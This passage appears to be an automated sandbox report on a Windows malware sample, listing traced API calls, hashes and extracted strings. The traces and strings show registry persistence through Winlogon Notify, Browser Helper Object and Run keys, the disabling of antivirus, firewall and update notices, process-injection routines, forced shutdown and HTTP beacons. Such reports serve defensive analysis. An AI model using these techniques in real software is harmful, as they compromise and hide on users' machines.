                                                                                                                                                                      • RegCreateKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,00000000,00000000,000F003F,0040F4FC,?,00000000), ref: 00406102
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,ShellRegEx,00000000,00000003,?,0000022A,?,?,0040F4FC,?,00000000), ref: 0040612E
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,0000022A,?,?,0040F4FC,?,00000000,?,?,?,?,?,?,?,?,00000001), ref: 0040613D
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000021,?,?,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 00406152
                                                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B},?), ref: 0040617C
                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040619C
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,DLLName,00000000,00000001,?,00000001), ref: 004061B7
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,Startup,00000000,00000001,Startup,00000008,?,DLLName,00000000,00000001,?,00000001), ref: 004061D3
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,00000001,?,00000001), ref: 004061E2
                                                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000000,CLSID\{F1ACE452-91D3-FF14-6B60-AD3718D5C8FC}\InProcServer32,?), ref: 00406204
                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040621B
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,?,00000001), ref: 00406233
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,ThreadingModel,00000000,00000001,Both,00000005,?,00000000,00000000,00000001,?,00000001), ref: 0040624F
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,00000001,?,00000001), ref: 0040625E
                                                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{F1ACE452-91D3-FF14-6B60-AD3718D5C8FC},?), ref: 00406271
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00406287
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000021,?,?,?,?,?,?,?,00000001), ref: 0040629C
                                                                                                                                                                      • Sleep.KERNEL32(000003E8,00000021,?,?,?,?,?,?,?,00000001), ref: 004062A9
                                                                                                                                                                      • RegCreateKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 004062DF
                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,g00d d0gg,00000000,00000000,?,?,?,?,00000000,?,00000000), ref: 0040631D
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,g00d d0gg,00000000,00000004,?,00000004,?,?,?,?,?,?,00000000,?,00000000), ref: 00406356
                                                                                                                                                                      • RegDeleteValueA.ADVAPI32(?,g00d d0gg,?,?,?,?,?,?,00000000,?,00000000), ref: 0040636F
                                                                                                                                                                      • Sleep.KERNEL32(00001388,g00d d0gg,?,?,?,?,?,?,00000000,?,00000000), ref: 0040637C
                                                                                                                                                                      • RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 0040639B
                                                                                                                                                                      • NtShutdownSystem.NTDLL(00000001), ref: 004063A6
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 004063CA
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004063E1
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,00412170,?,?,?,0040F4FC,?,00000000), ref: 004063F8
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,qnd_b__-13), ref: 00406409
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2318488636.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2318475437.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318503177.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318517554.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318531156.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318543719.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$Close$Create$Value$Handle$AddressProclstrcat$Attributes$Process$lstrlen$DeleteOpenWritelstrcpy$EnvironmentExpandStrings$CurrentLibraryLoadQuerySystemTempTime$DirectoryErrorLastNameObjectProcess32SingleWaitlstrcmpiwsprintf$ExitMutexPathReadSleepStartupThread$AdjustFirstInfoInformationNextPointerPrivilegeSizeSnapshotTokenToolhelp32$ClassCommandComputerCountEnumHeapLineModulePriorityShutdownTerminateTickVersion
                                                                                                                                                                      • String ID: %02X$%AppData%\$%ComSpec%$%CommonProgramFiles%\System\$--k33p$.dll$.exe$AntiVirusDisableNotify$AntiVirusOverride$Both$CLSID\{F1ACE452-91D3-FF14-6B60-AD3718D5C8FC}\InProcServer32$CreateRemoteThread$DLLName$Debugger$Default Flags$Extended Flags$FirewallDisableNotify$IsInstalled$NoAutoUpdate$NtAllocateVirtualMemory$NtOpenProcessToken$NtQueryInformationToken$NtShutdownSystem$NtWriteVirtualMemory$QlC5hT0yHn63XEm5LqJ2OxSkGj2v$RtlAdjustPrivilege$SOFTWARE\Microsoft\Active Setup\Installed Components\$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B}$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{F1ACE452-91D3-FF14-6B60-AD3718D5C8FC}$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$ShellRegEx$Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy$Software\Microsoft\Windows\CurrentVersion\Run$Startup$StubPath$ThreadingModel$UpdatesDisableNotify$explorer.exe$f$firefox.exe$g00d d0gg$iexplore.exe$iphlpapi.dll$kernel32.dll$mozilla.exe$ntdll.dll$opera.exe$qnd_b__-13$rasapi32.dll$sOfTwaRe\mIcRoSofT\cOdE SToRe dAtAbAsE\Distribution Units\{79AABB1D-FADB-7161-3CCB-997899295A29}$seamonkey.exe$tmp$wininet.dll$winlogon.exe${%02X%02X%02X%02X-%02x%02x-%02x%02x-%02X%02X-%02X%02X%02X%02X%02x%02x}${10F5781A-0D97-0F99-EF77-BA382916E579}${4D415259-4a4f-4e45-5334-4D4152594a4f}${9703941E-446E-952F-954A-3DA8A91ED84F}
                                                                                                                                                                      • API String ID: 1618137752-521143632
                                                                                                                                                                      • Opcode ID: 7795afdd26422b98606130c06c03d0fcc75b2a593c07fc7c1f629372ddbf79cd
                                                                                                                                                                      • Instruction ID: fcd3a91cfab7fa25ee27508f4df0295c9928967f58dd1d1f7e7acfc0775f1f2c
                                                                                                                                                                      • Opcode Fuzzy Hash: 7795afdd26422b98606130c06c03d0fcc75b2a593c07fc7c1f629372ddbf79cd
                                                                                                                                                                      • Instruction Fuzzy Hash: D1233BB19443406AE630B6349D47F9B3A989B40318F140A3FFA89B61D3E77C9529C79F
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,004049C8,?,00000100,?,?,00000104), ref: 00401549
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,00000100,?,?,00000104), ref: 0040156D
                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,00000100), ref: 00401588
                                                                                                                                                                      • ReadFile.KERNEL32(00000000,?,00001000,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 004015F1
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000080,00000000), ref: 00401601
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000080,00000000), ref: 00401607
                                                                                                                                                                      • DeleteFileA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000080), ref: 0040160D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2318488636.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2318475437.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318503177.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318517554.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318531156.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318543719.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$CloseCreateHandle$AttributesDeleteRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3513576528-0
                                                                                                                                                                      • Opcode ID: 6edca4130fc9ff9253b416a2a54cfdd097daa11b75cfe95610963849548db182
                                                                                                                                                                      • Instruction ID: ead9107263b76718dec6335517b8b67c7343bef8d8983c19364d90e74fa0285a
                                                                                                                                                                      • Opcode Fuzzy Hash: 6edca4130fc9ff9253b416a2a54cfdd097daa11b75cfe95610963849548db182
                                                                                                                                                                      • Instruction Fuzzy Hash: 8021A1B1A802007AE53031757C03F5B369C8B84758F190A3BFE06B91D6F5BDE62941AF
                                                                                                                                                                      APIs
                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,0040F4FC,?,00000000,?,?,?,0040F4FC,?,00000000), ref: 004029F2
                                                                                                                                                                      • gethostbyname.WS2_32(?), ref: 00402A11
                                                                                                                                                                      • htons.WS2_32(00000050), ref: 00402A30
                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 00402A5B
                                                                                                                                                                      • closesocket.WS2_32(00000000), ref: 00402A84
                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00403920
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412170,00000012), ref: 004039CD
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412170,00000012), ref: 004039EE
                                                                                                                                                                      • Sleep.KERNEL32(000927C0,?,?,?,?,?,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 00403A0C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2318488636.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2318475437.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318503177.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318517554.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318531156.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318543719.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: TimeValue$FileSleepSystemclosesocketgethostbynamehtonslstrcpysocket
                                                                                                                                                                      • String ID: %u.%u.%u.%s$Default Flags$isdn$modem
                                                                                                                                                                      • API String ID: 1870287861-1479823086
                                                                                                                                                                      • Opcode ID: 96acd3ec43a28ade2448771fe3d395cccea34a43eb763a718d322ee28eed03fa
                                                                                                                                                                      • Instruction ID: 2ee653d2f7df55df6907a0a9b2e57412953aa95c4ecf6cadf6b3b4d2485eddb3
                                                                                                                                                                      • Opcode Fuzzy Hash: 96acd3ec43a28ade2448771fe3d395cccea34a43eb763a718d322ee28eed03fa
                                                                                                                                                                      • Instruction Fuzzy Hash: E412D3B0A002149FDB20EF28CD45B997BB5AF45304F1482FAE808B73D1D7799A85CF59
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004019BF
                                                                                                                                                                      • Process32First.KERNEL32(00000000,?), ref: 00401A0A
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00401C12
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2318488636.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2318475437.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318503177.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318517554.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318531156.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318543719.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                      • String ID: T2A
                                                                                                                                                                      • API String ID: 1083639309-2019523081
                                                                                                                                                                      • Opcode ID: 1e948c95aaa689c1ab19c458318ec14d1cde759feb862ccd8d81315eded4b2f4
                                                                                                                                                                      • Instruction ID: 7c6136f779b091b801ec7ced044d4ecd4f532b5644714f746006db05a6c2f320
                                                                                                                                                                      • Opcode Fuzzy Hash: 1e948c95aaa689c1ab19c458318ec14d1cde759feb862ccd8d81315eded4b2f4
                                                                                                                                                                      • Instruction Fuzzy Hash: 627108706482009BE710AB24DD41B9B3BB8AB45348F04453AF945E72E1F37CE669CB9A
                                                                                                                                                                      APIs
                                                                                                                                                                      • select.WS2_32(00000000,?,00000000,00000000,?), ref: 004026B1
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2318488636.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2318475437.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318503177.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318517554.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318531156.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318543719.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: select
                                                                                                                                                                      • String ID: (
                                                                                                                                                                      • API String ID: 1274211008-3887548279
                                                                                                                                                                      • Opcode ID: 90583d2b313c707988cabef44d03dce10f4e52a7c9587c3868e69efa36d07d23
                                                                                                                                                                      • Instruction ID: 6522e2537fb8c8e721883018bf3c6a7a4605c561a93ab5d2b210f47b7f02e7dc
                                                                                                                                                                      • Opcode Fuzzy Hash: 90583d2b313c707988cabef44d03dce10f4e52a7c9587c3868e69efa36d07d23
                                                                                                                                                                      • Instruction Fuzzy Hash: 094172341083859BD3318F24C588BEBFBE4EB89314F24492FD8D9972C2D3B99865CB56
                                                                                                                                                                      APIs
                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,0040F4FC,?,00000000,?,?,?,0040F4FC,?,00000000), ref: 004029F2
                                                                                                                                                                      • gethostbyname.WS2_32(?), ref: 00402A11
                                                                                                                                                                      • htons.WS2_32(00000050), ref: 00402A30
                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 00402A5B
                                                                                                                                                                      • closesocket.WS2_32(00000000), ref: 00402A84
                                                                                                                                                                      • Sleep.KERNEL32(00000000), ref: 004038FD
                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00403920
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412170,00000012), ref: 004039CD
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412170,00000012), ref: 004039EE
                                                                                                                                                                      • Sleep.KERNEL32(000927C0,?,?,?,?,?,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 00403A0C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2318488636.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2318475437.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318503177.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318517554.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318531156.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318543719.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: SleepTimeValue$FileSystemclosesocketgethostbynamehtonslstrcpysocket
                                                                                                                                                                      • String ID: %u.%u.%u.%s$Default Flags$isdn$modem
                                                                                                                                                                      • API String ID: 104937078-1479823086
                                                                                                                                                                      • Opcode ID: 23bc219b5744c9827f2f8f9d690f39e8be89f3e5c2ca0e4ade555a46899b0d44
                                                                                                                                                                      • Instruction ID: 51207a69c6f84e7cd26efe5e5962b9edc78a43a6ad57510283d07de6baf8f7fe
                                                                                                                                                                      • Opcode Fuzzy Hash: 23bc219b5744c9827f2f8f9d690f39e8be89f3e5c2ca0e4ade555a46899b0d44
                                                                                                                                                                      • Instruction Fuzzy Hash: 94C12C71A002149BDB20DF38CD49BD977B5AF44304F1082B6E509F72D1E7B99A58CF5A
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegCreateKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections,00000000,00000000,00000000,000F003F,00000000,?,00000000,?,?,0040228C), ref: 00401720
                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,00001000,00000000,?,00000000,?,?,0040228C), ref: 00401751
                                                                                                                                                                      • lstrcatA.KERNEL32(?,\Software\Microsoft\Windows\CurrentVersion\Internet Settings,?,?,?,?,?,?,?,00001000,00000000,?,00000000,?,?,0040228C), ref: 0040177F
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000003,00000000,00000000,00020019,?,\Software\Microsoft\Windows\CurrentVersion\Internet Settings,?,?,?,?,?,?,?,00001000,00000000,?), ref: 00401795
                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,ProxyEnable,00000000,?,?,?,?,?,?,00020019,?,\Software\Microsoft\Windows\CurrentVersion\Internet Settings), ref: 004017D2
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(?,Connections,00000000,00020019,?,?,?,?,?,?,?,?,?,00020019,?,\Software\Microsoft\Windows\CurrentVersion\Internet Settings), ref: 00401817
                                                                                                                                                                      • RegEnumValueA.ADVAPI32(?,?,?,?,00000000,?,?,00001000), ref: 0040189E
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004018BD
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00020019,?,\Software\Microsoft\Windows\CurrentVersion\Internet Settings), ref: 004018CF
                                                                                                                                                                      • RegEnumKeyA.ADVAPI32(80000003,?,?,00001000), ref: 004018E8
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00001000,00000000,?,00000000,?,?,0040228C), ref: 004018FF
                                                                                                                                                                      Strings
                                                                                                                                                                      • ProxyEnable, xrefs: 004017C6
                                                                                                                                                                      • \Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 00401779
                                                                                                                                                                      • _Classes, xrefs: 00401762
                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections, xrefs: 00401716
                                                                                                                                                                      • Connections, xrefs: 0040180B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2318488636.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2318475437.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318503177.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318517554.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318531156.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318543719.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Close$EnumOpenValue$CreateQuerylstrcatlstrlen
                                                                                                                                                                      • String ID: Connections$ProxyEnable$Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections$\Software\Microsoft\Windows\CurrentVersion\Internet Settings$_Classes
                                                                                                                                                                      • API String ID: 1447802672-1466506419
                                                                                                                                                                      • Opcode ID: f294c517c20514b2f8faf26ffca72a768d62fae29f0f9d7abf442c73c3c025a1
                                                                                                                                                                      • Instruction ID: 66e194334fdec41dc41c183a83ee0e0423d2cbbda799cea80f6bf4481fa86f55
                                                                                                                                                                      • Opcode Fuzzy Hash: f294c517c20514b2f8faf26ffca72a768d62fae29f0f9d7abf442c73c3c025a1
                                                                                                                                                                      • Instruction Fuzzy Hash: 2941EEB2904344AAF73176219C0AF9B7B9C9B44348F14443FFE88B51D3E279962CC667
                                                                                                                                                                      APIs
                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 00402065
                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?), ref: 0040206E
                                                                                                                                                                      • htons.WS2_32(00000000), ref: 004020C9
                                                                                                                                                                      • inet_addr.WS2_32(?), ref: 004020F0
                                                                                                                                                                      • gethostbyname.WS2_32(?), ref: 00402107
                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 0040213E
                                                                                                                                                                      • closesocket.WS2_32(00000000), ref: 00402169
                                                                                                                                                                      • wsprintfA.USER32 ref: 004021B5
                                                                                                                                                                      • send.WS2_32(00000000,?,00000000,00000000), ref: 004021C5
                                                                                                                                                                      • lstrcmpiA.KERNEL32(?,HTTP/1.0 200), ref: 00402206
                                                                                                                                                                      Strings
                                                                                                                                                                      • Mozilla/4.0 (compatible; MSIE 6.0; Win32), xrefs: 00402297
                                                                                                                                                                      • HTTP/1.0 200, xrefs: 00402200
                                                                                                                                                                      • GET /%s HTTP/1.0Host: %s:%uUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0), xrefs: 00402183
                                                                                                                                                                      • GET /%s HTTP/1.0Host: %sUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0), xrefs: 0040217C
                                                                                                                                                                      • 0, xrefs: 004021EF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2318488636.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2318475437.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318503177.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318517554.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318531156.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318543719.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: closesocketgethostbynamehtonsinet_addrlstrcmpilstrcpylstrlensendsocketwsprintf
                                                                                                                                                                      • String ID: 0$GET /%s HTTP/1.0Host: %sUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)$GET /%s HTTP/1.0Host: %s:%uUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)$HTTP/1.0 200$Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                      • API String ID: 2963668025-182194581
                                                                                                                                                                      • Opcode ID: c5914518efa31e6daf1d6d1c5ad6aede4384d13f612d860edefc583a5bee64dd
                                                                                                                                                                      • Instruction ID: 67f1582d9d65064009b7b38dedaf8d45dcb20af8a74f6ab8ff9eb660a5d02e62
                                                                                                                                                                      • Opcode Fuzzy Hash: c5914518efa31e6daf1d6d1c5ad6aede4384d13f612d860edefc583a5bee64dd
                                                                                                                                                                      • Instruction Fuzzy Hash: 83810DB0E002045BD710AB749E49B5F76B8AB05314F0441B6EB05FB2D1E7FC9A59C79E
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F,?,?,?,?,?,?,?,?,?,004053DB), ref: 00401455
                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,ShellRegEx,00000000,?,?,?,?,?,?,0002001F,?), ref: 00401482
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,0002001F,?), ref: 0040149E
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F,?,?,?,?,?,0002001F,?), ref: 004014BF
                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,ShellRegEx,00000000,?,?,?,?,?,?,0002001F,?,?,?,?,?,0002001F), ref: 004014F3
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2318488636.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2318475437.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318503177.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318517554.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318531156.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318543719.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: OpenQueryValue$Close
                                                                                                                                                                      • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced$ShellRegEx
                                                                                                                                                                      • API String ID: 2529929805-3421572904
                                                                                                                                                                      • Opcode ID: 4a95097c5cd9ac49c2c0031509204a62f35eae4208d5cebb0b882de0ceae9e8d
                                                                                                                                                                      • Instruction ID: 4b3f21838edb9e41f667f6993cf98c5a1242fec43926aa3cdaef8ebd8d2009fd
                                                                                                                                                                      • Opcode Fuzzy Hash: 4a95097c5cd9ac49c2c0031509204a62f35eae4208d5cebb0b882de0ceae9e8d
                                                                                                                                                                      • Instruction Fuzzy Hash: 8C1187B2904300B7E700AA61AD46F2777ACBB8470DF11083EFD45B51D2F279DA288767
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetStartupInfoA.KERNEL32(?), ref: 00401393
                                                                                                                                                                      • CreateProcessA.KERNEL32(?,--k33p,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004013AF
                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,?,--k33p,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004013C9
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,00000000,?,?), ref: 004013D9
